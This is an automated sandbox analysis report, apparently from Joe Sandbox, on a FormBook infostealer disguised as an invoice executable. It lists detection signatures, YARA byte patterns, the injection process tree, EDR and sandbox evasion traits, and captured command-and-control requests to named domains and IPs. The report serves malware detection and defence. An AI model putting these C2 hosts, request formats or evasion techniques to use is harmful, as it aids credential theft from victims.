Windows Analysis Report
HYCO_Invoices MS2 & MS3.exe

Overview

General Information

Sample name: HYCO_Invoices MS2 & MS3.exe
Analysis ID: 1427199
MD5: 96fe3d00e8b2ba36dfb240a004ab28e1
SHA1: 757169009af1210acab01e9a2385e5cca4b94f20
SHA256: 57b81292b61a36171a2ad822d255aae878a8f9ca187efb43da94c7865c8388c4
Tags: exe, Formbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • HYCO_Invoices MS2 & MS3.exe (PID: 1020 cmdline: "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe" MD5: 96FE3D00E8B2BA36DFB240A004AB28E1)
    • HYCO_Invoices MS2 & MS3.exe (PID: 4484 cmdline: "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe" MD5: 96FE3D00E8B2BA36DFB240A004AB28E1)
    • HYCO_Invoices MS2 & MS3.exe (PID: 6528 cmdline: "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe" MD5: 96FE3D00E8B2BA36DFB240A004AB28E1)
      • JlRhrxMCYjuGzWWvXkXNzhLX.exe (PID: 5580 cmdline: "C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 1196 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • JlRhrxMCYjuGzWWvXkXNzhLX.exe (PID: 2680 cmdline: "C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2088 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2cf83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16552:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2dd83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            No Sigma rule has matched
            Timestamp: 04/17/24-08:39:42.561650 | SID: 2855465 | Source Port: 49743 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 04/17/24-08:40:41.121135 | SID: 2855465 | Source Port: 49759 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 04/17/24-08:39:17.162071 | SID: 2855465 | Source Port: 49738 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 04/17/24-08:40:11.246310 | SID: 2855465 | Source Port: 49751 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 04/17/24-08:39:56.404713 | SID: 2855465 | Source Port: 49747 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected

            AV Detection

            Source: HYCO_Invoices MS2 & MS3.exe, ReversingLabs: Detection: 47%
            Source: HYCO_Invoices MS2 & MS3.exe, Virustotal: Detection: 40%
            Source: Yara match, File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: HYCO_Invoices MS2 & MS3.exe, Joe Sandbox ML: detected
            Source: HYCO_Invoices MS2 & MS3.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: HYCO_Invoices MS2 & MS3.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: replace.pdb source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820275052.000000000012E000.00000002.00000001.01000000.0000000A.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000000.1974653157.000000000012E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: HYCO_Invoices MS2 & MS3.exe, HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 5_2_00E1BC00 FindFirstFileW,FindNextFileW,FindClose (5_2_00E1BC00)
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 4x nop then xor eax, eax (5_2_00E09460)
            Source: C:\Windows\SysWOW64\replace.exe, Code function: 4x nop then pop edi (5_2_00E1210D)

            Networking

            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49738 -> 79.98.25.1:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 91.195.240.117:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49747 -> 64.190.62.22:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49751 -> 217.76.128.34:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49759 -> 178.211.137.59:80
            Source: DNS query: www.www60270.xyz
            Source: Joe Sandbox View, IP Address: 91.195.240.117
            Source: Joe Sandbox View, IP Address: 79.98.25.1
            Source: Joe Sandbox View, IP Address: 217.76.128.34
            Source: Joe Sandbox View, ASN Name: SEDO-ASDE
            Source: Joe Sandbox View, ASN Name: RACKRAYUABRakrejusLT
            Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox View, ASN Name: TIS-DIALOG-ASRU
            Source: Joe Sandbox View, ASN Name: NBS11696US
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /aleu/?QbZ=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.maxiwalls.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /aleu/?QbZ=7syVtg0wm45Xa+0QzpeywUsAZ6yAPvjdu6gzDOasV7nOCe5fUnUhGq++vYwq6UnaX+M1S/9yW1y2BV80NTALyVFlDkUwTwEaqx89+DAXSUPaXuqsOTbI6d4=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.choosejungmann.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /aleu/?QbZ=jXFvQTK4oWsNW5HZJ/0gKTQct2QKO2STTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZkV7I+j781KbGhsSlxE46GWITw0n47D4H34I=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.paydayloans3.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /aleu/?QbZ=heiUU9lLv45IJG5VBKLzBQ/QU5pXOEZ122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloq+HQclTA5c3JDTwCxVF3w8TOe3DJCoRyHmQ=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.colchondealquiler.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /aleu/?QbZ=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.skibinscy-finanse.plConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: unknownDNS traffic detected: queries for: www.maxiwalls.com
            Source: unknownHTTP traffic detected: POST /aleu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.choosejungmann.comOrigin: http://www.choosejungmann.comContent-Type: application/x-www-form-urlencodedContent-Length: 200Cache-Control: max-age=0Connection: closeReferer: http://www.choosejungmann.com/aleu/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:02 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:05 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:08 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:11 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:31 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:34 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:37 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:41 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: HYCO_Invoices MS2 & MS3.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: HYCO_Invoices MS2 & MS3.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: HYCO_Invoices MS2 & MS3.exeString found in binary or memory: http://ocsp.comodoca.com0
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2892203666.0000000004B0E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.skibinscy-finanse.pl
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2892203666.0000000004B0E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.skibinscy-finanse.pl/aleu/
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://arsys.es/css/parking2.css
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/default.css
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/footer.html
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/header.html
            Source: firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/icon.png
            Source: firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/thumbnail.png
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: replace.exe, 00000005.00000002.2891299160.000000000469C000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.000000000308C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cgqbbu1mvnevcxzh.app
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://klientams.iv.lt/
            Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: replace.exe, 00000005.00000002.2889773857.0000000003092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: replace.exe, 00000005.00000002.2889773857.0000000003092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: replace.exe, 00000005.00000003.2088352031.0000000007EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backup
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendas
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominio
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resell
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=ssl
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominios
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seo
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sms
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=re
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordp
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hosting
